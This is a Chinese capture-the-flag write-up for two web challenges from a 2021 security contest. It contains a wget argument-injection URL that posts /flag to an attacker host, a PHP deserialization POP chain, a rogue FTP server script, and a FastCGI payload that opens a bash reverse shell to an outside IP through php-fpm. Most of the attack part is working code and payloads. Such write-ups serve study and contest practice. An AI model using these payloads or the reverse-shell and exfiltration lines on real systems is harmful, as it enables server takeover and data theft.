陇原战"疫"2021网络安全大赛

CheckIN

简单的跑一遍

然后

发现了利用点
拿wget把flag带出来即可：

/wget?argv=1&argv=--post-file&argv=/flag&argv=http://ip:port

然后监听就好

eaaasyphp

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            throw new Error("Error");
        }
    }
}

if (isset($_GET['code'])) {
    unserialize($_GET['code']);
} else {
    highlight_file(__FILE__);
}

之前也遇到过一道差不多的题，利用ftp被动模式打fastcgi
然后就是先看看phpinfo的配置
这里有两个方法
一是Hint类二是str4都能
所以payload：

/?code=O:4:"Hint":-1:{}

(绕过__wakeup，按网上说PHP7 < 7.0.10当反序列化时变量个数与实际不符是会绕过 但是这道题目版本是7.2 将0修改为其他整数时是绕过失败的，但是改为负数即可绕过)
或者

?code=O:6:"Bypass":2:{s:2:"m1";O:4:"Esle":0:{}s:4:"str4";s:7:"phpinfo";}

然后我们发现

这个意思是我们利用file_put_contents写入不了shell的
然后

考虑用file_put_contents去攻击php-fpm
在vps上运行这个脚本

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

然后利用gopher生成发向fpm的数据包

%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/121.41.59.127/8080%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

然后构造pop

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __construct()
    {
        Check::$str1 = true;
    }
}
class Bunny {
    public $data;
    public $filename;
    public function __construct()
    {
        $this->filename = "ftp://aaa@121.41.59.127:23/123";
        $this->data=urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/121.41.59.127/8080%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");
    }
}

class Welcome {
    public $username;
    public function __construct()
    {
        Check::$str2 = true;
        $this->username = new Bunny();
    }
}

class Bypass {
    public $str4 ;
    public $m1;
    public function __construct()
    {
        $this->m1 = new Esle();
        $this->str4 = new Welcome();
    }
}
$pop = new Bypass();

echo urlencode(serialize($pop));

打过去监听起就行

当然还有其他师傅的方法
方法一
方法二

声明:本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担! 本网站采用BY-NC-SA协议进行授权！转载请注明文章来源！ 图片失效请留言通知博主及时更改！